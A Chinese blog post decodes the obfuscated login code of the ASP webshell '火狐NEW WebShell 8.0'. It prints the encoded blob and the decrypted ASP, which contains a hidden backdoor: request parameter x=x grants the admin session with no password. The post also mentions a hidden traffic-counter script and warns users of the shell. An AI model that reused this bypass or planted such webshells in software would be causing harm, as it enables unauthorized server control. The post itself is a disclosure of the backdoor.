解密《火狐NEW WebShell 8.0》后门代码

用解密软件可以很容易的把《火狐NEW WebShell 8.0》中99%的代码解密出来,但其中还是有一段代码是加密的琳ZWpcVbfVdexriry.rirpeYV_琳pDVddZ`_xrhVS#R#U^Z_ryp.pFdVcARdd琳pppppppFC=xy琳ppV_UpZW琳琳:WpDVddZ`_xrhVS#R#U^Z_ryp-/pFdVcARddpEYV_琳pp:WpCVbfVde~7`c^xrARddryp-/prrpEYV_琳pppp:WpCVbfVde~7`c^xrARddryp.pFdVcARddpEYV_琳ppppppDVddZ`_xrhVS#R#U^Z_ryp.pFdVcARdd琳ppppppCVda`_dV~CVUZcVTepFC=琳pppp6]dV琳 pcVda`_dV~hcZeVrp验证p失败p!r琳pppp6_Up:W琳pp琳pp6]dV琳ppppD:.r-TV_eVcpdej]V.wW`_e}dZkV+""#aiw/-Sc/p-Sc/p火狐?6HpHVSDYV]]p)~!p-Sc/p-Sc/r琳ppppD:.D:vr-W`c^pRTeZ`_.wrvFC=vrwp^VeY`U.wa`dew/r琳ppppD:.D:vrp密码:-Z_afep_R^V.wARddwpejaV.waRddh`cUwpdZkV.w""&w/r琳ppppD:.D:vrpv_Sda,p-Z_afepejaV.wdfS^ZewpgR]fV.w登录w/p- W`c^/p- TV_eVc/r琳pppppCVda`_dV~HcZeVpD:琳pppppCVda`_dV~HcZeVr-TV_eVcpdej]V.wW`_e}dZkV+""#aiw/-Sc/每一天睜開眼睛ヽo妳和陽光都在→那就是ωǒ要的菋來-Sc/r琳 pCVda`_dV~HcZeVr-TV_eVcpdej]V.wW`_e}dZkV+""#aiw/-Sc/本人到此只是技术上的研究。鄙视搞破坏的-Sc/r琳 pCVda`_dV~HcZeVr-TV_eVcpdej]V.wW`_e}dZkV+""#aiw/-Sc/ -Sc/r琳pppppCVda`_dV~HcZeVr-TV_eVcpdej]V.wW`_e}dZkV+""#aiw/-Sc/3J+神魂颠倒じ☆-Sc/r琳pppppcVda`_dV~hcZeVr-daR_pdej]V.UZda]Rj+_`_V/-dTcZaep]R_XfRXV.rr[RgRdTcZaerrpdcT.rrYeea+ T`f_e#%~&""jVd~T`^ T]ZT\~Rdai0ZU.#%$((*&$'v]`X`.""rr/- dTcZae/- dTcZae/- daR_/r琳pp6_Up:W琳ppCVda`_dV~6_U琳6_Up:W琳
不过只要你稍懂些Asp分析下它附近已解密出来的代码,要把上面这段代码也解密出来其实也很简单。解密后[code]if request(“x”)=”x” then
Session(“web2a2dmin”) = UserPass
URL()
end if
If Session(“web2a2dmin”) <> UserPass Then
If Request.Form(“Pass”) <> “” Then
If Request.Form(“Pass”) = UserPass Then
Session(“web2a2dmin”) = UserPass
Response.Redirect URL
Else
response.write” 验证 失败 !”
End If
Else
SI=”

火狐NEW WebShell 8.0


SI=SI&”


SI=SI&” 密码:
SI=SI&”


Response.Write SI
Response.Write”

每一天睜開眼睛ヽ~妳和陽光都在→那就是ωǒ要的菋來

Response.Write”

本人到此只是技术上的研究。鄙视搞破坏的

Response.Write”

 

Response.Write”

BY:神魂颠倒じ☆

response.write”
End If
Response.End
End If[/code]
看到了吧,代码里面隐藏着一个后门[code]if request(“x”)=”x” then
Session(“web2a2dmin”) = UserPass
URL()
end if[/code]和一个流量统计代码,加这些代码的人还真不厚道,目前网上流传的版本中很多都有这个后门,使用《火狐NEW WebShell 8.0》的可要小心了。

本站使用「署名 4.0 国际」创作协议,可自由转载、引用,但需署名原版权作者且注明文章出处。

免责声明:
1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长,并提供相应的资质证明,我们将于3个工作日内予以删除!
2. 本站不保证所提供下载的资源的准确性、安全性和完整性,资源仅供下载学习之用!如果喜欢,请你购买正版,享受售后服务!
3. 您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容资源!如用于商业或者非法用途,与本站无关,一切后果请用户自负!
4. 如有链接无法下载、失效或广告,请联系客服处理,有奖励!
5. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需!


我的盒子|觅盒 » 解密《火狐NEW WebShell 8.0》后门代码

2 评论

  1. 头像

    这个后门难道web2a2dmin这个是万能密码么?
    不像啊 只是多了个流量统计??

  2. 头像

    呵呵 原来这个后门已经有人发现了

发表评论

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据

提供最优质的资源集合

立即查看 了解详情